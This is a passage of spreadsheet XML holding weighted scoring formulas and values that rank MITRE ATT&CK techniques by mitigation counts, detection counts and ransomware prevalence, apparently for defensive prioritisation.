        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z7">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>48</v>
      </c>
      <c r="AA7">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.48</v>
      </c>
      <c r="AB7">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.48</v>
      </c>
      <c r="AC7" s="29" t="s">
        <v>107</v>
      </c>
      <c r="AD7" s="25" t="str" cm="1">
        <f t="array" ref="AD7">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC7)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE7" s="25">
        <f>IF(AD7="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF7" s="25" t="str" cm="1">
        <f t="array" ref="AF7">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC7)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG7" s="25">
        <f>IF(AF7="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH7" s="25" t="str" cm="1">
        <f t="array" ref="AH7">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC7)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI7" s="25">
        <f>IF(AH7="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ7" s="25" t="str" cm="1">
        <f t="array" ref="AJ7">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC7)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK7" s="25">
        <f>IF(AJ7="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL7" s="25" t="str" cm="1">
        <f t="array" ref="AL7">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC7)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM7" s="25">
        <f>IF(AL7="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN7" s="58">
        <v>6</v>
      </c>
      <c r="AO7" s="51">
        <v>1</v>
      </c>
      <c r="AP7" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.4815166666666667</v>
      </c>
      <c r="AQ7" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.93838888888888894</v>
      </c>
      <c r="AR7" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.93838888888888894</v>
      </c>
      <c r="AS7" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT7" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU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8" spans="1:47" ht="48">
      <c r="A8" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.37170000000000003</v>
      </c>
      <c r="B8" s="25">
        <f>SUM(H8,M8,V8)*(1+SUM(AE8,AG8,AI8,AK8,AM8))</f>
        <v>2.7170000000000001</v>
      </c>
      <c r="C8" s="25" t="s">
        <v>108</v>
      </c>
      <c r="D8" s="25" t="s">
        <v>109</v>
      </c>
      <c r="E8" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F8" s="51">
        <v>7</v>
      </c>
      <c r="G8" s="51">
        <v>5</v>
      </c>
      <c r="H8" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.6</v>
      </c>
      <c r="I8">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.7</v>
      </c>
      <c r="J8">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.7</v>
      </c>
      <c r="K8">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L8">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M8" s="25">
        <v>1</v>
      </c>
      <c r="N8" s="51">
        <v>0</v>
      </c>
      <c r="O8" s="51">
        <v>24</v>
      </c>
      <c r="P8" s="51">
        <v>12</v>
      </c>
      <c r="Q8" s="51">
        <v>7</v>
      </c>
      <c r="R8" s="52" t="s">
        <v>110</v>
      </c>
      <c r="S8" s="51">
        <v>10</v>
      </c>
      <c r="T8" s="51" t="s">
        <v>111</v>
      </c>
      <c r="U8" s="51">
        <v>15</v>
      </c>
      <c r="V8" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.44285714285714284</v>
      </c>
      <c r="W8">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X8">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y8">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z8">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>43</v>
      </c>
      <c r="AA8">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.43</v>
      </c>
      <c r="AB8">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.43</v>
      </c>
      <c r="AC8" s="29" t="s">
        <v>112</v>
      </c>
      <c r="AD8" s="25" t="str" cm="1">
        <f t="array" ref="AD8">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC8)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE8" s="25">
        <f>IF(AD8="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF8" s="25" t="str" cm="1">
        <f t="array" ref="AF8">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC8)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG8" s="25">
        <f>IF(AF8="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH8" s="25" t="str" cm="1">
        <f t="array" ref="AH8">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC8)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI8" s="25">
        <f>IF(AH8="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ8" s="25" t="str" cm="1">
        <f t="array" ref="AJ8">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC8)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK8" s="25">
        <f>IF(AJ8="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL8" s="25" t="str" cm="1">
        <f t="array" ref="AL8">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC8)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM8" s="25">
        <f>IF(AL8="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN8" s="58">
        <v>3</v>
      </c>
      <c r="AO8" s="51">
        <v>1</v>
      </c>
      <c r="AP8" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.37170000000000003</v>
      </c>
      <c r="AQ8" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.90566666666666673</v>
      </c>
      <c r="AR8" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.90566666666666673</v>
      </c>
      <c r="AS8" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT8" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU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9" spans="1:47" ht="32.1">
      <c r="A9" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.39057857142857144</v>
      </c>
      <c r="B9" s="25">
        <f>SUM(H9,M9,V9)*(1+SUM(AE9,AG9,AI9,AK9,AM9))</f>
        <v>2.2391190476190475</v>
      </c>
      <c r="C9" s="25" t="s">
        <v>113</v>
      </c>
      <c r="D9" s="25" t="s">
        <v>114</v>
      </c>
      <c r="E9" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F9" s="51">
        <v>3</v>
      </c>
      <c r="G9" s="51">
        <v>6</v>
      </c>
      <c r="H9" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.44999999999999996</v>
      </c>
      <c r="I9">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J9">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K9">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.6</v>
      </c>
      <c r="L9">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.6</v>
      </c>
      <c r="M9" s="44">
        <v>1</v>
      </c>
      <c r="N9" s="51">
        <v>0</v>
      </c>
      <c r="O9" s="51">
        <v>21</v>
      </c>
      <c r="P9" s="51">
        <v>7</v>
      </c>
      <c r="Q9" s="51">
        <v>18</v>
      </c>
      <c r="R9" s="52" t="s">
        <v>115</v>
      </c>
      <c r="S9" s="51">
        <v>9</v>
      </c>
      <c r="T9" s="51" t="s">
        <v>116</v>
      </c>
      <c r="U9" s="51">
        <v>12</v>
      </c>
      <c r="V9" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.41904761904761906</v>
      </c>
      <c r="W9">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X9">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y9">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z9">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>46</v>
      </c>
      <c r="AA9">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.46</v>
      </c>
      <c r="AB9">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.46</v>
      </c>
      <c r="AC9" s="29" t="s">
        <v>117</v>
      </c>
      <c r="AD9" s="25" t="str" cm="1">
        <f t="array" ref="AD9">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC9)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE9" s="25">
        <f>IF(AD9="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF9" s="25" t="str" cm="1">
        <f t="array" ref="AF9">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC9)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG9" s="25">
        <f>IF(AF9="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH9" s="25" t="str" cm="1">
        <f t="array" ref="AH9">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC9)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI9" s="25">
        <f>IF(AH9="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ9" s="25" t="str" cm="1">
        <f t="array" ref="AJ9">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC9)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK9" s="25">
        <f>IF(AJ9="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL9" s="25" t="str" cm="1">
        <f t="array" ref="AL9">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC9)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM9" s="25">
        <f>IF(AL9="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN9" s="59">
        <v>5</v>
      </c>
      <c r="AO9" s="51">
        <v>1</v>
      </c>
      <c r="AP9" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.39057857142857144</v>
      </c>
      <c r="AQ9" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.74637301587301585</v>
      </c>
      <c r="AR9" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.74637301587301585</v>
      </c>
      <c r="AS9" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT9" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU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0" spans="1:47">
      <c r="A10" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.4386228571428572</v>
      </c>
      <c r="B10" s="25">
        <f>SUM(H10,M10,V10)*(1+SUM(AE10,AG10,AI10,AK10,AM10))</f>
        <v>1.7195619047619051</v>
      </c>
      <c r="C10" s="25" t="s">
        <v>118</v>
      </c>
      <c r="D10" s="25" t="s">
        <v>119</v>
      </c>
      <c r="E10" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F10" s="51">
        <v>1</v>
      </c>
      <c r="G10" s="51">
        <v>1</v>
      </c>
      <c r="H10" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I10">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J10">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K10">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L10">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M10" s="44">
        <v>1</v>
      </c>
      <c r="N10" s="51">
        <v>1</v>
      </c>
      <c r="O10" s="51">
        <v>34</v>
      </c>
      <c r="P10" s="51">
        <v>12</v>
      </c>
      <c r="Q10" s="51">
        <v>3</v>
      </c>
      <c r="R10" s="53" t="s">
        <v>120</v>
      </c>
      <c r="S10" s="51">
        <v>7</v>
      </c>
      <c r="T10" s="51" t="s">
        <v>121</v>
      </c>
      <c r="U10" s="51">
        <v>12</v>
      </c>
      <c r="V10" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.41904761904761906</v>
      </c>
      <c r="W10">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X10">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y10">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z10">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>50</v>
      </c>
      <c r="AA10">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.5</v>
      </c>
      <c r="AB10">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.5</v>
      </c>
      <c r="AC10" s="29" t="s">
        <v>122</v>
      </c>
      <c r="AD10" s="25" t="str" cm="1">
        <f t="array" ref="AD10">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC10)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE10" s="25">
        <f>IF(AD10="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF10" s="25" t="str" cm="1">
        <f t="array" ref="AF10">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC10)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG10" s="25">
        <f>IF(AF10="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH10" s="25" t="str" cm="1">
        <f t="array" ref="AH10">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC10)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI10" s="25">
        <f>IF(AH10="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ10" s="25" t="str" cm="1">
        <f t="array" ref="AJ10">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC10)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK10" s="25">
        <f>IF(AJ10="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL10" s="25" t="str" cm="1">
        <f t="array" ref="AL10">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC10)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM10" s="25">
        <f>IF(AL10="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN10" s="59">
        <v>8</v>
      </c>
      <c r="AO10" s="51">
        <v>1</v>
      </c>
      <c r="AP10" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.4386228571428572</v>
      </c>
      <c r="AQ10" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.57318730158730169</v>
      </c>
      <c r="AR10" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.57318730158730169</v>
      </c>
      <c r="AS10" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AT10" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AU1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1" spans="1:47" ht="48">
      <c r="A11" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.34803333333333336</v>
      </c>
      <c r="B11" s="25">
        <f>SUM(H11,M11,V11)*(1+SUM(AE11,AG11,AI11,AK11,AM11))</f>
        <v>2.1470000000000002</v>
      </c>
      <c r="C11" s="25" t="s">
        <v>123</v>
      </c>
      <c r="D11" s="25" t="s">
        <v>124</v>
      </c>
      <c r="E11" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F11" s="51">
        <v>2</v>
      </c>
      <c r="G11" s="51">
        <v>2</v>
      </c>
      <c r="H11" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I11">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J11">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K11">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L11">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M11" s="44">
        <v>1</v>
      </c>
      <c r="N11" s="51">
        <v>0</v>
      </c>
      <c r="O11" s="51">
        <v>0</v>
      </c>
      <c r="P11" s="51">
        <v>15</v>
      </c>
      <c r="Q11" s="51">
        <v>6</v>
      </c>
      <c r="R11" s="52" t="s">
        <v>125</v>
      </c>
      <c r="S11" s="51">
        <v>12</v>
      </c>
      <c r="T11" s="52" t="s">
        <v>126</v>
      </c>
      <c r="U11" s="51">
        <v>21</v>
      </c>
      <c r="V11" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.41428571428571426</v>
      </c>
      <c r="W11">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>33</v>
      </c>
      <c r="X11">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.6</v>
      </c>
      <c r="Y11">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.6</v>
      </c>
      <c r="Z11">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>21</v>
      </c>
      <c r="AA11">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.21</v>
      </c>
      <c r="AB11">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.21</v>
      </c>
      <c r="AC11" s="29" t="s">
        <v>127</v>
      </c>
      <c r="AD11" s="25" t="str" cm="1">
        <f t="array" ref="AD11">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC11)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE11" s="25">
        <f>IF(AD11="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF11" s="25" t="str" cm="1">
        <f t="array" ref="AF11">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC11)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG11" s="25">
        <f>IF(AF11="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH11" s="25" t="str" cm="1">
        <f t="array" ref="AH11">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC11)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI11" s="25">
        <f>IF(AH11="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ11" s="25" t="str" cm="1">
